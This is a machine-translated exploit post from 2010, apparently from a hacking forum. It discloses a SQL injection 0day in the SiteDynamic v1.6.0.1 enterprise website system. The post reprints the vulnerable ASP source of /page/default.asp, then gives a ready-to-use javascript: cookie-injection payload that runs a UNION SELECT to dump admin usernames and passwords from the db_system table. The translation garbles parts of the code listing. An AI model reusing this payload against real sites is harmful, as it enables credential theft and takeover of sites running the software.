SiteDynamic v1. 6. 0. 1 Sql Injection 0day-vulnerability warning-the black bar safety net

2010-01-26T00:00:00
ID MYHACK58:62201026070
Type myhack58
Reporter 佚名
Modified 2010-01-26T00:00:00

Description

SiteDynamic enterprise website management system v1. 6. 0. 1 I will not say more, with the station not many, helping a friend to dig the hole, the Forum on hee ya just sent it with the fckeditor editor upload vulnerability. Nonsense not much said, see code:

0 0 1// /page/default. asp 5-1 2 2 rows

0 0 2

0 0 3

0 0 4 <%

0 0 5 pageID=strCLng(Trim(Request("pageID")))

0 0 6 ID=strCLng(Trim(Request("ID")))

0 0 7

0 0 8 If isNumeric(pageID) = False Then

0 0 9 FoundErr=True

0 1 0 Message=Message & "<li>parameters error!& lt;/li>"

0 1 1 End If

0 1 2

0 1 3 if FoundErr < > True then

0 1 4

0 1 5 if ID=0 then

0 1 6

0 1 7 If pageID<>0 Then

0 1 8 set rs=server. CreateObject("adodb. recordset")

0 1 9 sql="Select * from db_channel where pageID="&pageID

0 2 0 rs. open sql,conn,1,1

0 2 1 pageName=rs("pageName")

0 2 2 description=rs("description")

0 2 3 keywords=rs("keywords")

0 2 4 pic=rs("pic")

0 2 5 link=rs("link")

0 2 6 PageMode=rs("PageMode")

0 2 7 PageAmount=rs("PageAmount")

0 2 8 PageLine=rs("PageLine")

0 2 9 intro=rs("intro")

0 3 0

0 3 1 If Not rs. Eof Then

0 3 2 if rs("pageID")>0 then

0 3 3 if rs("ChiID")>0 then

0 3 4 strChiID=""

0 3 5 set strRs=conn. execute("select pageID from db_channel where ParentID=" & rs("pageID") & " or ParentPath like '" & rs("ParentPath") & "," & rs("pageID") & ",%'")

0 3 6

0 3 7 do while not strRs. eof

0 3 8 if strChiID="" then

0 3 9 strChiID=strRs(0)

0 4 0 else

0 4 1 strChiID=strChiID & "," & amp; strRs(0)

0 4 2 end if

0 4 3 strRs. movenext

0 4 4 loop

0 4 5 else

0 4 6 strChiID=pageID

0 4 7 end if

0 4 8 end if

0 4 9 end If

0 5 0 rs. close

0 5 1 set rs=nothing

0 5 2

0 5 3 sql="select * from db_page Where pageID in ("&amp; strChiID&")"

0 5 4 Else

0 5 5 sql="select * from db_page where 1=1"

0 5 6 End If

0 5 7 else

0 5 8 sql="select * from db_page where ID="&ID&""

0 5 9 End if

0 6 0

0 6 1 if not (Trim(Request("keyword"))="" or isempty(Trim(Request("keyword"))) ) then

0 6 2 sql=sql&" and (title like '%" & Trim(Request("keyword")) & "%' or content like '%" & Trim(Request("keyword")) & "%')" //bugs

0 6 3 end if

0 6 4

0 6 5 sql=sql&" order by dateandtime desc"

0 6 6 'response. write sql

0 6 7 'response. end

0 6 8 set rs=server. CreateObject("adodb. recordset")

0 6 9 rs. open sql,conn,1,1

0 7 0

0 7 1 if ID<>0 then

0 7 2 if Trim(rs("PageMode"))=4 then

0 7 3 response. redirect Trim(rs("URL"))

0 7 4 end if

0 7 5 'file type

0 7 6 if Trim(rs("PageMode"))=3 then

0 7 7 filesURL=Trim(rs("files"))

0 7 8 If filesURL = "" Then

0 7 9 response. write "No data!"

0 8 0 End If

0 8 1 Call Getdownload(filesURL)

0 8 2 end if

0 8 3

0 8 4 srtTitle=Trim(rs("Title"))

0 8 5 srtPageID=Trim(rs("pageID"))

0 8 6 description=rs("description")

0 8 7 keywords=rs("keywords")

0 8 8 end if

0 8 9

0 9 0 sub getTitle()

0 9 1 if pageID=0 and ID=0 then

0 9 2 response. write "full-text search"

0 9 3 elseif pageID<>0 then

0 9 4 response. write ""&pageName&""

0 9 5 elseif ID<>0 then

0 9 6 response. write "" & amp; srtTitle & ""

0 9 7 end if

0 9 8 end sub

0 9 9

1 0 0 sub getadoTitle()

1 0 1 if pageID=0 and ID=0 then

1 0 2 response. write "full-text search"

1 0 3 elseif pageID<>0 then

1 0 4 The response. write ""&pageName&""

1 0 5 elseif ID<>0 then

1 0 6 doPageID=rs("PageID")

1 0 7 set doRs=server. CreateObject("adodb. recordset")

1 0 8 Set doRs=conn. Execute("Select * From db_channel Where pageID="&amp; doPageID)

1 0 9 response. write "" & Trim(doRs("pageName")) & ""

1 1 0 end if

1 1 1 end sub

1 1 2

1 1 3 sub getLocation()

1 1 4 if pageID=0 and ID=0 then

1 1 5 response. write "->>full-text search"

1 1 6 elseif ID<>0 then

1 1 7 call Nav(srtPageID)

1 1 8 else

1 1 9 call Nav(pageID)

1 2 0 end if

1 2 1 end sub

Use code

javascript:alert(document. cookie="keyword=" + escape("a%') union select 1,2,3,username&chr(1 2 4)&Password,5,6,7,8,9,0,1,2,3,4,5,6 from db_system union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6 from db_page where 1=2 and (title like '%a"));location. href="/page/Default. asp? pageID=0";

PS:focus on the use of tricks.. Injected into the statement along the lines of